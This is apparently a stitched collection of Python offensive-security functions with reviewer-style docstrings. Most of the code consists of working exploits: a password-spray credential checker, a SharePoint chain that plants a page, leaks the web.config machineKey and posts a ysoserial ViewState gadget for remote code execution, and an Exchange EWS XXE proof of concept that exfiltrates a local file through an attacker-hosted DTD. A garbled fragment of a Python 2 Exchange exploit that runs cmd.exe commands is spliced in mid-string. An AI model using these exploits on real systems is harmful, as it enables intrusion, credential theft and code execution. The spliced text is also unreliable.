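def check_creds(opts, timeout=15):
    """Try one username/password pair against *url* and report the outcome.

    Args:
        opts: 6-tuple ``(url, domain, username, password, authtype, proxies)``.
            ``authtype == "ntlm"`` selects ``HttpNtlmAuth``; any other value
            falls back to requests' basic-auth tuple. A truthy ``domain`` is
            prefixed as ``DOMAIN\\username`` in both cases.
        timeout: per-request timeout in seconds (new keyword, default 15).
            Without it a single unresponsive host stalls the whole spray.

    Returns:
        ``(username, password)`` when the server answers with any status other
        than 401, else ``None`` (also on transport errors, which are printed
        rather than raised so a spray loop keeps running).
    """
    url, domain, username, password, authtype, proxies = opts
    user = f"{domain}\\{username}" if domain else username
    if authtype == "ntlm":
        auth = HttpNtlmAuth(user, password)
    else:
        auth = (user, password)
    try:
        # verify=False and allow_redirects=False are deliberate for a spray tool:
        # self-signed targets are common, and a 302 to a login page must not be
        # mistaken for success. verify=False does make the request MITM-able.
        res = requests.get(
            url,
            verify=False,
            proxies=proxies,
            auth=auth,
            allow_redirects=False,
            timeout=timeout,
        )
    except Exception as e:  # broad on purpose: one bad host must not abort the loop
        print(f"Error occurred with {username}:{password}: {e}")
        return None
    # NOTE(review): "not 401" also counts 403/404/500 as a valid credential;
    # depending on the endpoint a stricter check (e.g. res.ok) may be wanted.
    if res.status_code != 401:
        print(f"Success! {username}:{password}")
        return username, password
    return None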
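def trigger_rce(target, domain, path, user, password, cmd, key, timeout=60):
    """Build a signed ViewState gadget with ysoserial.net and POST it to zoombldr.aspx.

    Args:
        target: host[:port] of the SharePoint site (plain HTTP is used).
        domain, user, password: NTLM credentials for the POST.
        path: application path, used for ``--apppath`` and as the prefix of
            ``_layouts/15/zoombldr.aspx`` in ``--path``.
        cmd: command string handed to the TypeConfuseDelegate gadget.
        key: HMACSHA256 validation key (e.g. as returned by ``get_vkey``).
        timeout: seconds allowed for the ysoserial run and for the HTTP request.

    Returns:
        The ``requests.Response`` of the POST (previously discarded).

    Raises:
        subprocess.CalledProcessError: if ysoserial exits non-zero. The
            original ignored the exit status and posted an empty __VIEWSTATE.
        subprocess.TimeoutExpired: if ysoserial does not finish in *timeout*.
    """
    ysoserial_argv = [
        'yss/ysoserial.exe',
        '-p', 'ViewState',
        '-g', 'TypeConfuseDelegate',
        '-c', '%s' % cmd,  # argv list, no shell: cmd is one argument, not re-parsed
        '--apppath=%s' % path,
        '--path=%s_layouts/15/zoombldr.aspx' % path,
        '--islegacy',
        '--validationalg=HMACSHA256',
        '--validationkey=%s' % key,
    ]
    proc = subprocess.run(
        ysoserial_argv,
        stdout=subprocess.PIPE,
        check=True,
        timeout=timeout,
    )
    rce = {"__VIEWSTATE": proc.stdout.decode()}
    return requests.post(
        "http://%s/_layouts/15/zoombldr.aspx" % target,
        data=rce,
        auth=HttpNtlmAuth('%s\\%s' % (domain, user), password),
        timeout=timeout,
    )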
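def init_requests(self, domain, username, password):
    """Create the shared ``requests.Session`` used by later calls.

    Sets ``self.logger`` and ``self.session``. TLS verification is disabled for
    the whole session and the project User-Agent is applied. NTLM auth is
    attached only when both ``username`` and ``password`` are truthy; a truthy
    ``domain`` is prefixed as ``DOMAIN\\username``.

    NOTE(review): the format string on the domain-prefix line was garbled
    (``'******' % (domain, username)``), which raises TypeError at runtime
    because the literal has no conversion specifiers. It is restored here as
    ``'%s\\%s'``, the form every other HttpNtlmAuth helper in this file uses —
    confirm against the upstream project.
    """
    self.logger = Logger().get_logger()
    self.session = requests.Session()
    # verify=False is deliberate (self-signed targets) but leaves every
    # request on this session open to interception.
    self.session.verify = False
    self.session.headers.update({'User-Agent': constants.USER_AGENT})
    if username and password:
        if domain:
            username = '%s\\%s' % (domain, username)
        self.session.auth = HttpNtlmAuth(username, password)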
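def put_page(target, domain, user, password, timeout=30):
    """Create ``/poc.aspx`` on *target* with an NTLM-authenticated HTTP PUT.

    The page is a DataFormWebPart whose XSLT echoes the ``HTTP_360Vulcan``
    server variable (the request header ``360Vulcan``) with output escaping
    disabled, so a later request can inject server-side markup through that
    header.

    Args:
        target: host[:port]; plain HTTP is used.
        domain, user, password: NTLM credentials; the account must be allowed
            to create pages in the site.
        timeout: request timeout in seconds (new keyword).

    Returns:
        The ``requests.Response`` (status 200 or 201).

    Raises:
        AssertionError: if the PUT returns anything but 200/201. Raised
            explicitly so the check is not stripped under ``python -O`` as the
            previous bare ``assert`` was.
    """
    payload = """<WebPartPages:DataFormWebPart runat="server">
<ParameterBindings>
<ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />
</ParameterBindings>
<xsl>
<xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:param name="ssi" />
<xsl:template match="/">
<xsl:value-of select="$ssi" disable-output-escaping="yes" />
</xsl:template>
</xsl:stylesheet>
</xsl>
</WebPartPages:DataFormWebPart>"""
    r = requests.put(
        "http://%s/poc.aspx" % target,
        data=payload,
        auth=HttpNtlmAuth('%s\\%s' % (domain, user), password),
        timeout=timeout,
    )
    if r.status_code not in (200, 201):
        raise AssertionError(
            "(-) page creation failed, user doesn't have site ownership rights!"
        )
    return r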
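def main():
    """Fetch an RDWeb feed over NTLM, parse its resources and write RDP/desktop files.

    Flow: parse CLI arguments, build an NTLM session, GET ``args.url`` once,
    reuse the response body as the ``.ASPXauth`` cookie for a second GET,
    parse that XML feed and, for every ``Resource`` and each of its terminal
    servers, download the RDP file and generate a desktop entry under
    ``RDP_FILES_PATH``.

    NOTE(review): the *entire* body of the first response is used as the
    cookie value; this only works if that endpoint returns the bare token.
    Confirm before relying on it.
    """
    timeout = 30  # a hung feed server must not block the script forever
    args = create_arguments()
    auth = get_auth_info(args)
    session = requests.Session()
    session.auth = HttpNtlmAuth(auth["user"], auth["password"])
    response = session.get(args.url, timeout=timeout)
    cookie = {".ASPXauth": response.text}
    response = session.get(args.url, cookies=cookie, timeout=timeout)
    # Server-controlled XML: if ElementTree is the stdlib parser it will not
    # fetch external entities, but defusedxml is the safer choice here.
    root = ElementTree.fromstring(response.text)
    os.makedirs(RDP_FILES_PATH, exist_ok=True)
    for item in root.findall("./{*}Publisher/{*}Resources/{*}Resource"):
        parsed_resource = parse_resource(item)
        for terminal_server in parsed_resource["terminal_servers"]:
            rdp_file = download_rdp(cookie, terminal_server)
            generate_desktop(parsed_resource, rdp_file)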
def __init__(self, args):
    """Keep the CLI options and prepare an NTLM-authenticated session.

    Copies the URL (plus its path component as ``self.service``), credentials,
    target, extra headers, HTTP method, body and content type from *args*, then
    builds ``self.s``: NTLM auth, a fixed Chrome User-Agent that *replaces*
    requests' default header set, and an HTTP proxy pinned to
    ``127.0.0.1:8080`` — an intercepting proxy must be listening there or every
    plain-HTTP request will fail.
    """
    parsed = urlparse(args.url)
    self.url = args.url
    self.service = parsed.path
    self.username = args.username
    self.password = args.password
    self.target = args.target
    self.headers = args.header
    self.method = args.request
    self.data = args.data
    self.content_type = args.content_type
    chrome_ua = (
        'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 '
        '(KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'
    )
    session = requests.Session()
    session.auth = HttpNtlmAuth(self.username, self.password)
    session.headers = {'User-Agent': chrome_ua}
    session.proxies = {'http': 'http://127.0.0.1:8080'}
    self.s = session
def __init__(self, site_root_url: str, username: str, password: str):
    """Initialise the base class and keep the site root plus NTLM credentials.

    ``self.site_url`` is stored verbatim (nothing validates it yet, see TODO)
    and ``self.auth`` is an ``HttpNtlmAuth`` ready to pass to requests calls.
    """
    super().__init__()
    # TODO: validate site_root_url (regex / urlparse) in a property setter
    self.auth = HttpNtlmAuth(username=username, password=password)
    self.site_url = site_root_url
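def main(t, usr, pwd, timeout=60):
    """Send the EWS XXE proof of concept to *t* while serving the DTD it calls back for.

    Starts a background ``HTTPServer`` (handler class ``xxe``) on
    ``0.0.0.0:port`` to serve ``poc.dtd``, then POSTs a ``RouteComplaint`` SOAP
    request whose base64-encoded ``Data`` carries a DOCTYPE that reads
    ``file:///<file>`` and pulls the external DTD from ``http://host:port``.
    ``port``, ``host`` and ``file`` are module-level globals.

    Args:
        t: Exchange host serving ``/ews/Exchange.asmx`` (HTTPS, certificate
            not verified — deliberate for lab targets, MITM-able otherwise).
        usr: ``user@domain``; sent as ``DOMAIN\\user`` for NTLM.
        pwd: the account password.
        timeout: seconds to wait for the EWS response (new keyword).

    Returns:
        The ``requests.Response`` of the POST (previously discarded).

    Raises:
        ValueError: if *usr* contains no ``@`` (previously an IndexError raised
            after the listener had already been started).
    """
    parts = usr.split("@")
    if len(parts) < 2:
        raise ValueError("usr must be in user@domain form, got %r" % (usr,))
    username, domain = parts[0], parts[1]
    # Listener is bound on every interface; restrict with a firewall if the
    # operator box is exposed. Daemon thread: it dies with the process, there
    # is no explicit shutdown.
    server = HTTPServer(('0.0.0.0', int(port)), xxe)
    handlerthr = Thread(target=server.serve_forever, args=())
    handlerthr.daemon = True
    handlerthr.start()
    h = {"Content-type": "text/xml; charset=utf-8"}
    # '%%' survives %-formatting as a literal '%' (parameter-entity syntax).
    xxe_payload = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY %% start "<![CDATA[">
<!ENTITY %% stuff SYSTEM "file:///%s">
<!ENTITY %% end "]]>">
<!ENTITY %% dtd SYSTEM "http://%s:%d/poc.dtd">
%%dtd;
]>""" % (file, host, int(port))
    d = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<soap:Header>
<t:RequestServerVersion Version="Exchange2010_SP2"></t:RequestServerVersion>
</soap:Header>
<soap:Body>
<m:RouteComplaint MessageDisposition="SaveOnly">
<m:Data>%s</m:Data>
</m:RouteComplaint>
</soap:Body>
</soap:Envelope>""" % b64encode(xxe_payload.encode()).decode("utf-8")
    return requests.post(
        "https://%s/ews/Exchange.asmx" % t,
        data=d,
        headers=h,
        verify=False,
        auth=HttpNtlmAuth('%s\\%s' % (domain, username), pwd),
        timeout=timeout,
    )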
</t:NumberedRecurrence> </t:Recurrence> </t:CalendarItem> </m:Items> </m:CreateItem> </soap:Body> </soap:Envelope> """ % payload2 res = requests.post("https://%s/ews/Exchange.asmx" % target, data=payload1, headers={ "Content-type": "text/xml; charset=utf-8", }, verify=False, auth=HttpNtlmAuth('%s' % (username), pwd)) if res.status_code != 200: print("error 1") exit() ct = res.content item_id = ct.split('<t:ItemId Id="')[1].split('"')[0] change_key = ct.split('ChangeKey="')[1].split('"')[0] print "Attacking target %s with user %s" % (target, username) print "Sending command cmd.exe /c %s" % cmd session = requests.Session() header = {"Cookie": "mkt=en-US"} data = { "destination": "https://%s/owa" % target,
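def get_vkey(target, domain, user, password, timeout=30):
    """Leak the ASP.NET machineKey validationKey through the planted ``poc.aspx``.

    Sends a ``360Vulcan`` request header (surfaced to the page's XSLT as the
    ``HTTP_360Vulcan`` server variable) containing a server-side include of
    ``/web.config``; the rendered page then embeds the ``<machineKey>`` element
    and the key is pulled out with a regex.

    Args:
        target: host[:port]; plain HTTP.
        domain, user, password: NTLM credentials.
        timeout: request timeout in seconds (new keyword).

    Returns:
        The captured validationKey (the 64 characters following
        ``validationKey="``; the pattern assumes the key is exactly that long).

    Raises:
        AssertionError: if no key is found in the response. Raised explicitly
            rather than via ``assert`` so the check survives ``python -O``.
    """
    headers = {
        "360Vulcan": "<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->"
    }
    r = requests.get(
        "http://%s/poc.aspx" % target,
        auth=HttpNtlmAuth('%s\\%s' % (domain, user), password),
        headers=headers,
        timeout=timeout,
    )
    match = re.search(r'machineKey validationKey="(.{64})', r.text)
    if not match:
        raise AssertionError("(-) unable to leak the validation key, exploit failed!")
    return match.group(1)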